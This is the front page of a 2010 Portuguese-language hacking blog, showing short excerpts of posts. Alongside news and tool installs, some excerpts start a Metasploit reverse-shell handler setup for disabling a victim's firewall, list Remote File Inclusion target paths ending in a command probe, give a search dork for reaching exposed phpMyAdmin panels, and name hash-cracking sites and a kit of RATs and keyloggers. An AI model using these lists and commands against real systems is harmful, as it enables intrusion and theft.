banner468

domingo, 29 de agosto de 2010

Metasploit - Desabilitando Firewall

<br><br>Me O que acontece?Configurei o firewall do Windows XP sp2 contra postscan, rodo o nmap e ele nos mostra todas as porta filtradas. Então executo um backdoor na maquina windows, ganho acesso ao shell do sistema (cmd.exe ou prompt de comando) e desabilito o firewall.O comando usado na aula e nativo do sistema operacional Windows e não um recurso do metasploit.Minha intenção nessa aula e de mostrar a importância de se conhecer um sistema operacional a fundo. Comandos: use multi/handlerset payload windows/meterpreter/reverse_tcpset...

quinta-feira, 26 de agosto de 2010

REMnux: A Distribuição Linux para Reverse-Engineering Malware

REMnux é uma distribuição Linux leve para auxiliar analistas de malware em engenharia reversa de software malicioso. A distribuição é baseada no Ubuntu e é mantido por Lenny Zeltser.REMnux é projetado para executar os serviços que são úteis para emular dentro de um ambiente de laboratório isolado na realização de análise de malware comportamentais. Como parte deste processo, o analista normalmente infecta um outro sistema de laboratório com a amostra de malware e direciona as ligações potencialmente maliciosos para o sistema REMnux que está escutando...

quarta-feira, 25 de agosto de 2010

Site para quebrar MD5

MD5:http://r0ot.podzemlje.net/?x=md5 http://paste2.org/p/441222http://www.md5decrypter.co.uk/http://hash.db.hk/md5.phphttp://plain-text.infohttp://insidepro.comhttp://md5decrypter.co.ukhttp://c0llision.nethttp://schwett.com/md5http://milw0rm.com/md5http://md5this.comhttp://tmto.orghttp://kerinci.nethttp://hash.db.hkhttp://md5.shalla.dehttp://hashcracking.info <-- API: https://hashcracking.info/check.php?hash= {hash}http://md5.opencracking.infohttp://bokehman.comhttp://hash-database.nethttp://md5-database.nethttp://web-security-services.comhttp://bitdelivery.netMulti:http://hashkiller.comhttp://sinhalayo159.07x.netIRC:http://md5.overclock.ch...

Crackear hash joomla

Uma pequena lista de sites uteis.http://www.james0baster.web.id/v1/joomlapass.phphttp://scr34mz.co.tv/joomlapass.phphttp://alanzka.co.tv/joomlapass.phphttp://thesyntaxerror.co.tv/joomlapass.phphttp://bliedessy.com/joomlapa...

Lista RFI - Remote File Inclusion

Remote File Inclusion (RFI) é um tipo de vulnerabilidade mais freqüentemente encontrados em sites, que permite a um atacante para incluir um arquivo remoto geralmente através de um script no servidor web. A vulnerabilidade ocorre devido ao uso de entrada fornecida pelo usuário sem a devida validação./includes/header.php?systempath=/Gallery/displayCategory.php?basepath=/index.inc.php?PATH_Includes=/nphp/nphpd.php?nphp_config[LangFile]=/include/db.php?GLOBALS[rootdp]=/ashnews.php?pathtoashnews=/ashheadlines.php?pathtoashnews=/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=/demo/includes/init.php?user_inc=/jaf/index.php?show=/inc/shows.inc.php?cutepath=/poll/admin/common.inc.php?base_path=/pollvote/pollvote.php?pollname=/sources/post.php?fil_config=/modules/My_eGallery/public/displayCategory.php?basepath=/bb_lib/checkdb.inc.php?libpach=/include/livre_include.php?no_connect=lol&chem_absolu=/index.php?from_market=Y&pageurl=/modules/mod_mainmenu.php?mosConfig_absolute_path=/pivot/modules/module_db.php?pivot_path=/modules/4nAlbum/public/displayCategory.php?basepath=/derniers_commentaires.php?rep=/modules/coppermine/themes/default/theme.php?THEME_DIR=/modules/coppermine/include/init.inc.php?CPG_M_DIR=/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=/coppermine/themes/maze/theme.php?THEME_DIR=/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=/myPHPCalendar/admin.php?cal_dir=/agendax/addevent.inc.php?agendax_path=/modules/mod_mainmenu.php?mosConfig_absolute_path=/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=/main.php?page=/default.php?page=/index.php?action=/index1.php?p=/index2.php?x=/index2.php?*********/index.php?conteudo=/index.php?cat=/include/new-visitor.inc.php?lvc_include_dir=/modules/agendax/addevent.inc.php?agendax_path=/shoutbox/expanded.php?conf=/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=/pivot/modules/module_db.php?pivot_path=/library/editor/editor.php?root=/library/lib.php?root=/e107/e107_handlers/secure_img_render.php?p=/zentrack/index.php?configFile=/main.php?x=/becommunity/community/index.php?pageurl=/GradeMap/index.php?page=/phpopenchat/contrib/yabbse/poc.php?sourcedir=/.xpl/asc?&cmd=uname...

Acessando Phpmyadmin

Com uma simples pesquisa em site de buscas, pode ter acesso a vários Phpmyadmin.inurl:/phpmyadmin/sql.php?Sites de buscas: Achei - http://www.achei.com.br/Alta Vista - http://www.altavista.com/Alltheweb - http://www.alltheweb.com/Aonde.com - http://www.aonde.com/Aonde.com.br - http://www.aonde.com.br/BrBusca - http://www.brbusca.com/Buscai - http://www.buscai.com.br/Cadê? - http://www.cade.com.br/Excite - http://www.excite.com/Farejador - http://www.farejador.ig.com.br/GigaBusca - http://www.gigabusca.com.br/Google -  http://www.google.com.br/HotBot...

domingo, 22 de agosto de 2010

Engenharia Reversa e Malware Analysis

IndividuaisSkywing - http://www.nynaeve.net/Egypt - http://0xegypt.blogspot.com/Yoni - http://blogs.msdn.com/michael_howard/Raymond Chen - http://blogs.msdn.com/oldnewthing/Sia0 - http://blogs.msdn.com/michkap/Rob P - http://geekswithblogs.net/robp/Default.aspxQuantam - http://qstuff.blogspot.com/Phn1x - http://hamsterswheel.com/techblog/Halavar Flake - http://addxorrol.blogspot.com/Pedram - http://pedram.redhive.com/blogTyler Shields - http://www.donkeyonawaffle.org/Wesley Shields - http://www.atarininja.org/Peter Wieland - http://blogs.msdn.com/peterwie/Michael...

quinta-feira, 19 de agosto de 2010

Esteganografia

Esteganografia (do grego "escrita escondida") é o estudo e uso das técnicas para ocultar a existência de uma mensagem dentro de outra. Em outras palavras, esteganografia é o ramo particular da criptologia que consiste em fazer com que uma forma escrita seja camuflada em outra a fim de mascarar o seu verdadeiro sentido.É importante frisar a diferença entre criptografia e esteganografia. Enquanto a primeira oculta o significado da mensagem, a segunda...

terça-feira, 17 de agosto de 2010

Bits e Bytes

Ola pessoal, vou falar um pouco hoje sobre a diferença entre bits e bytes, vejo alguma coisas escritas de forma errada, e induzindo usuários ao erro. Essa pequena diferença passa despercebido pela maioria dos usuários.Vamos começar a entender a diferença entre b de bits e B de bytes:1 byte = 8 bits1 kilobytes = 1024 bytes ( Não 1000 bytes com pensam a maioria)Quando é escrito KB significa kilobytes, e quando for Kb significa kilobit.Bom, ate aqui tudo bem, agora vou citar um exemplo real, que a maioria tem dificuldade em assimilar. Qual a velocidade...

Hackers criam avião automático para capturar dados de redes sem-fio

Usando um avião de aeromodelismo e um piloto automático opensource, o grupo hacker Ardupilot criou o Wi-Fi Aerial Surveillance Platform. O projeto, apresentado na conferência hacker DEFCON, permite sniffar (capturar o tráfego de) redes sem fio abertas ou com criptografia fraca. Veja mais detalhes no site do projeto. Fonte: Wi-Fi Aerial Surveillance Platform, WASP drone | sUAS N...

segunda-feira, 16 de agosto de 2010

UnrealIRCd distribui malware para Linux

Assim como os usuários do Mac OS X, os usuários do Linux possuem uma falsa percepção de que seus sistemas operacionais são imunes contra malwares. Infelizmente para estes usuários, os administradores do UnrealIRCd.com informaram que seu código-fonte para Unix/Linux foi comprometido e continha um malware desde novembro de 2009.Detectado como Troj/UnIRC-A pela Sophos, o malware estava hospedado no repositório de download principal do UnrealIRCd....

domingo, 15 de agosto de 2010

Vulnerabilidade em nível de kernel afeta todas as versões do Windows

Pesquisadores descobriram uma vulnerabilidade de nível kernel no Windows. Todas as versões suportadas do Windows foram afetadas, do XP SP3 ao 7 e também o 2003 e 2008 Server. A técnica, divulgada originalmente neste blog, permite que atacantes ganhem privilégios escalados e pode permitir a execução de código remoto. Ainda não há registros de sua utilização por crackers.Ref: http://www.theregister.co.uk/2010/08/06/unpatched_windows_kernel_vuln/...

quinta-feira, 12 de agosto de 2010

Instalando metasploit no Ubuntu

O Metasploit Framework é bem suportado na plataforma Ubuntu. As instruções a seguir devem ser igualmente aplicáveis para Kubuntu, Xubuntu, e Debian.Dependências: Instale as dependências do Ruby:$ sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygemsInstale o cliente do Subversion:$ sudo apt-get install subversionPara construir as extensões nativas (pcaprub, lorcon2, etc), os seguintes pacotes precisam ser instalados:$ sudo apt-get build-dep ruby$ sudo apt-get install ruby-dev libpcap-dev...

quarta-feira, 11 de agosto de 2010

BackTrack 4 R1 – Public Release

A Equipe do BackTrack tem o orgulho de anunciar o lançamento público do BackTrack 4 R1. Correndo o risco de soar como um disco quebrada, nós acreditamos que esta versão é de longe a melhor versão lançada até o momento. Com uma brilhante novo kernel 2.6.34, há muitas melhorias significativas, como o suporte a hardware expandido. Confira algumas screenshots.Ferramentas foram atualizados em todo o sistema, e um ambiente desktopFluxbox foi adicionado....

quarta-feira, 4 de agosto de 2010

The Hacker's Kit [Tools, Rats, Keyloggers, Stealers, Scanners]

The Hack Tools Compilation! Batch - DELmE's Batch Virus Generator v 2.0- Power Of Batch [Text File]Binders - Bl0b B!nder 0.2.0 + USG- BlackHole Binder- F.B.I. Binder- Predator 1.6- PureBiND3R by d3will- Schniedelwutz Binder 1.0- Simple Binder by Stonedinfect- sp1r1tus Binder 1.0- Tool-Store Binder 1.0- Tool-Store Toasty Binder 1.0- Yet Another Binder 2.0- OthersCrypters - Bifrost Crypter by ArexX 2- Cryptable Seduction 1.0 by DizzY- Crypter by Permabatt- Crypter bY YoDa- Cryptic 1.5- Daemon Crypt 2 Public- Deception 4 by [RaGe] [Favorite :D]-...

Pages (38)123456 Next

 

Subscribe to our Newsletter

Contact our Support

Email us: youremail@gmail.com

Our Team Memebers